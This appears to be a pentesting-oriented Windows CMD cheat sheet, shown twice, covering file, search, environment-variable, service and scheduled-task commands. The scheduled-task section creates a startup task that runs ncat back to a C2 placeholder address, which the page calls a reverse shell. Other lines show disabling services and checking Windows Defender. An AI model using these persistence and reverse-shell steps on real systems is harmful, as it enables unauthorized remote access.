CMD

Basics

Located at C:\Windows\System32\cmd.exe.

General

Key/Command

Description

cls

Clear the screen

doskey /history

Prints the session's command history.

page up

Places the first command in our session history to the prompt.

page down

Places the last command in history to the prompt.

⇧

View previously run commands.

⇩

View most recent commands run.

⇨

Types the previous command to prompt one character at a time.

⇦

N/A

F3

Will retype the entire previous entry to our prompt.

F5

Pressing F5 multiple times will allow you to cycle through previous commands.

F7

Opens an interactive list of previous commands.

F9

Enters a command to our prompt based on the number specified. The number corresponds to the commands place in our history.

# list directory
dir
# list hidden files
dir /a:h
# current working directory
cd
chdir
# move to another directory
cd <PATH>
chdir <PATH>
# print the structure of current directory & subdirs
tree
# directories & files
tree /F

Directories

# create new dir
mkdir <name>
md <name>
# delete empty dir
rmdir <name>
rd <name>
# delete non-empty dir
rmdir /S <name>
rd /S <name>
# move dir
move <source> <dest>

Files

# view contents
type <filename>
# view contents of all files at once
type *.txt
# read all files from all subdirectories
for /r %i in (*) do type "%i" >> all_files_content.txt
# view contents once-screen at a time, remove extra blank space
more <filename> /S
# pipe large-output commands
systeminfo | more
# create a file
echo <text> > <filename>
fsutil file createNew <filename> 222
# rename a file
ren <filename> <newfilename>
rename <filename> <newfilename>
# delete a file
del <filename>
erase <filename>
# delete files based on a specific attribute
del /A:R *
# copy a file (with validation)
copy <source> <dest> /V
# move a file
move <source> <dest>

Copy

xcopy has been deprecated for robocopy (robust file copy). The former resets any file attributes by default which can be useful from an attacker's perspective. The latter is a combination of copy, xcopy, and move. It is made for large directories and drive syncing.

# copy dir
xcopy <source> <dest> <options>
# recursive (+empty dirs)
xcopy <source> <dest> /E 
# retain attributes
xcopy <source> <dest> /K
# basic robocopy usage
robocopy <source> <dest>

Operations

Searching

# Search dirs defined in PATH
where cmd.exe
# Recursive search
where /R c:\users\ text.txt
# Search for strings within a file or output (no wildcards/regex)
find "string" file.txt
# Lines that do NOT match
find /V "string" file.txt
# Case insensitive
find /I "string" file.txt
# Display line numbers
find /N "string" file.txt
# Upgrade from find -> similar to grep (accepts regex)
findstr "name" test.txt

Sorting

# Sort file and write to output
sort text.txt /O sorted.txt
# Reverse sort
sort text.txt /r
# Remove dupes
sort text.txt /unique

Comparing

# compare two files (byte output) 
comp test.txt test2.txt
# ASCII output with line numbers
comp test.txt test2.txt /A /L
# Shows the whole life instead of just chars (comp)
fc test.txt test2.txt /N

Environment Variables

Global not case-sensitive variables, format -> %ENV_VAR%. They are 2 major scopes:

System -> OS-defined, globally-accessible
User -> user-defined, user-accessible

Managing Env Vars

set -> temp, i.e., current session, setx -> permanent, i.e., registry changes.

# Displaying all env vars
set
# Displaying the vars' value
set %PATH%
echo %PATH%
# Setting a local var
set LOCAL_VAR=test
# Creating
set DCIP=172.16.10.10
setx DCIP 172.16.10.10
# Deleting
setx DCIP ""

Interesting Env Vars

Variable Name

Description

%PATH%

Specifies a set of directories where executable programs are located.

%OS%

The current operating system on the user's workstation.

%SYSTEMROOT%

Expands to C:\Windows. A system-defined read-only variable containing the Windows system folder. Anything Windows considers important to its core functionality is found here, including important data, core system binaries, and configuration files.

%LOGONSERVER%

Provides us with the login server for the currently active user followed by the machine's hostname. We can use this information to know if a machine is joined to a domain or workgroup.

%USERPROFILE%

Provides us with the location of the currently active user's home directory. Expands to C:\Users\{username}.

%ProgramFiles%

Equivalent of C:\Program Files. This location is where all the programs are installed on an x64 based system.

%ProgramFiles(x86)%

Equivalent of C:\Program Files (x86). This location is where all 32-bit programs running under WOW64 are installed. Note that this variable is only accessible on a 64-bit host. It can be used to indicate what kind of host we are interacting with. (x86 vs. x64 architecture)

Services

Note that not all services will respond to a stop request, regardless of our permissions, if other running programs/services depend on them.
When modifying a service, the changes will come into effect after the service is restarted. All changes made are reflected in the Windows registry and will persist on reboot, so services can be taken out permanently.

# Query running services
sc query type= service
tasklist /svc
net start
wmic service list brief # deprecated
# Starting/stopping a svc
sc <start | stop> <service>
net <start | stop | pause | continue> <service>
# Querying Windows Defender
sc query windefend
# Modifying start type (service won't be able to start with 'sc start <service>')
sc config <service> start= disabled
# Reverting the change
sc config <service> start= auto

Scheduled Tasks

# Viewing all scheduled tasks
schtasks /Query /V /FO list
# Querying a specific task
schtasks /query /tn "My Task" /V /fo list

Create Syntax

Parameter

Description

/sc

Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters.

/tn

Sets the name for the task we are building. Each task must have a unique name.

/tr

Sets the trigger and task that should be run. This can be an executable, script, or batch file.

Specify the host to run on, much like in Query.

Specifies the local user or domain user to utilize

Sets the Password of the user-specified.

/mo

Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day.

/rl

Allows us to limit the privileges of the task. Options here are limited access and Highest. Limited is the default value.

Will set the task to be deleted after completion of its actions.

For creating a new scheduled task we must specify, at a minimum, the following:

/create : to tell it what we are doing
/sc : we must set a schedule
/tn : we must set the name
/tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"

Change Syntax

Parameter

Description

/tn

Designates the task to change

/tr

Modifies the program or action that the task runs.

/ENABLE

Change the state of the task to Enabled.

/DISABLE

Change the state of the task to Disabled.

# Adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# Running the task immediately
schtasks /run /tn "My Task"

Delete Syntax

Parameter

Description

/tn

Identifies the task to delete.

Specifies the name or IP address to delete the task from.

Specifies the user to run the task as.

Specifies the password to run the task as.

Stops the confirmation warning.

# Deleting a task
schtasks /delete /tn "My Task" /f

Help

# Listing available commands
help
# Getting cmd-specific help
help <command>
<command> /?

PreviousCLIs NextPowerShell

Last updated 1 year ago

Was this helpful?

CMD

Basics

Located at C:\Windows\System32\cmd.exe.

General

Key/Command

Description

cls

Clear the screen

doskey /history

Prints the session's command history.

page up

Places the first command in our session history to the prompt.

page down

Places the last command in history to the prompt.

⇧

View previously run commands.

⇩

View most recent commands run.

⇨

Types the previous command to prompt one character at a time.

⇦

N/A

F3

Will retype the entire previous entry to our prompt.

F5

Pressing F5 multiple times will allow you to cycle through previous commands.

F7

Opens an interactive list of previous commands.

F9

Enters a command to our prompt based on the number specified. The number corresponds to the commands place in our history.

# list directory
dir
# list hidden files
dir /a:h
# current working directory
cd
chdir
# move to another directory
cd <PATH>
chdir <PATH>
# print the structure of current directory & subdirs
tree
# directories & files
tree /F

Directories

# create new dir
mkdir <name>
md <name>
# delete empty dir
rmdir <name>
rd <name>
# delete non-empty dir
rmdir /S <name>
rd /S <name>
# move dir
move <source> <dest>

Files

# view contents
type <filename>
# view contents of all files at once
type *.txt
# read all files from all subdirectories
for /r %i in (*) do type "%i" >> all_files_content.txt
# view contents once-screen at a time, remove extra blank space
more <filename> /S
# pipe large-output commands
systeminfo | more
# create a file
echo <text> > <filename>
fsutil file createNew <filename> 222
# rename a file
ren <filename> <newfilename>
rename <filename> <newfilename>
# delete a file
del <filename>
erase <filename>
# delete files based on a specific attribute
del /A:R *
# copy a file (with validation)
copy <source> <dest> /V
# move a file
move <source> <dest>

Copy

# copy dir
xcopy <source> <dest> <options>
# recursive (+empty dirs)
xcopy <source> <dest> /E 
# retain attributes
xcopy <source> <dest> /K
# basic robocopy usage
robocopy <source> <dest>

Operations

Searching

# Search dirs defined in PATH
where cmd.exe
# Recursive search
where /R c:\users\ text.txt
# Search for strings within a file or output (no wildcards/regex)
find "string" file.txt
# Lines that do NOT match
find /V "string" file.txt
# Case insensitive
find /I "string" file.txt
# Display line numbers
find /N "string" file.txt
# Upgrade from find -> similar to grep (accepts regex)
findstr "name" test.txt

Sorting

# Sort file and write to output
sort text.txt /O sorted.txt
# Reverse sort
sort text.txt /r
# Remove dupes
sort text.txt /unique

Comparing

# compare two files (byte output) 
comp test.txt test2.txt
# ASCII output with line numbers
comp test.txt test2.txt /A /L
# Shows the whole life instead of just chars (comp)
fc test.txt test2.txt /N

Environment Variables

Global not case-sensitive variables, format -> %ENV_VAR%. They are 2 major scopes:

System -> OS-defined, globally-accessible
User -> user-defined, user-accessible

Managing Env Vars

set -> temp, i.e., current session, setx -> permanent, i.e., registry changes.

# Displaying all env vars
set
# Displaying the vars' value
set %PATH%
echo %PATH%
# Setting a local var
set LOCAL_VAR=test
# Creating
set DCIP=172.16.10.10
setx DCIP 172.16.10.10
# Deleting
setx DCIP ""

Interesting Env Vars

Variable Name

Description

%PATH%

Specifies a set of directories where executable programs are located.

%OS%

The current operating system on the user's workstation.

%SYSTEMROOT%

%LOGONSERVER%

Provides us with the login server for the currently active user followed by the machine's hostname. We can use this information to know if a machine is joined to a domain or workgroup.

%USERPROFILE%

Provides us with the location of the currently active user's home directory. Expands to C:\Users\{username}.

%ProgramFiles%

Equivalent of C:\Program Files. This location is where all the programs are installed on an x64 based system.

%ProgramFiles(x86)%

Services

Note that not all services will respond to a stop request, regardless of our permissions, if other running programs/services depend on them.
When modifying a service, the changes will come into effect after the service is restarted. All changes made are reflected in the Windows registry and will persist on reboot, so services can be taken out permanently.

# Query running services
sc query type= service
tasklist /svc
net start
wmic service list brief # deprecated
# Starting/stopping a svc
sc <start | stop> <service>
net <start | stop | pause | continue> <service>
# Querying Windows Defender
sc query windefend
# Modifying start type (service won't be able to start with 'sc start <service>')
sc config <service> start= disabled
# Reverting the change
sc config <service> start= auto

Scheduled Tasks

# Viewing all scheduled tasks
schtasks /Query /V /FO list
# Querying a specific task
schtasks /query /tn "My Task" /V /fo list

Create Syntax

Parameter

Description

/sc

Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters.

/tn

Sets the name for the task we are building. Each task must have a unique name.

/tr

Sets the trigger and task that should be run. This can be an executable, script, or batch file.

Specify the host to run on, much like in Query.

Specifies the local user or domain user to utilize

Sets the Password of the user-specified.

/mo

Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day.

/rl

Allows us to limit the privileges of the task. Options here are limited access and Highest. Limited is the default value.

Will set the task to be deleted after completion of its actions.

For creating a new scheduled task we must specify, at a minimum, the following:

/create : to tell it what we are doing
/sc : we must set a schedule
/tn : we must set the name
/tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"

Change Syntax

Parameter

Description

/tn

Designates the task to change

/tr

Modifies the program or action that the task runs.

/ENABLE

Change the state of the task to Enabled.

/DISABLE

Change the state of the task to Disabled.

# Adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# Running the task immediately
schtasks /run /tn "My Task"

Delete Syntax

Parameter

Description

/tn

Identifies the task to delete.

Specifies the name or IP address to delete the task from.

Specifies the user to run the task as.

Specifies the password to run the task as.

Stops the confirmation warning.

# Deleting a task
schtasks /delete /tn "My Task" /f

Help

# Listing available commands
help
# Getting cmd-specific help
help <command>
<command> /?

PreviousCLIs NextPowerShell

Last updated 1 year ago

Was this helpful?

CMD

Basics

General

Navigation

Directories

Files

Copy

Operations

Searching

Sorting

Comparing

Environment Variables

Managing Env Vars

Interesting Env Vars

Services

Scheduled Tasks

Create Syntax

Change Syntax

Delete Syntax

Help

CMD

Basics

General

Navigation

Directories

Files

Copy

Operations

Searching

Sorting

Comparing

Environment Variables

Managing Env Vars

Interesting Env Vars

Services

Scheduled Tasks

Create Syntax

Change Syntax

Delete Syntax

Help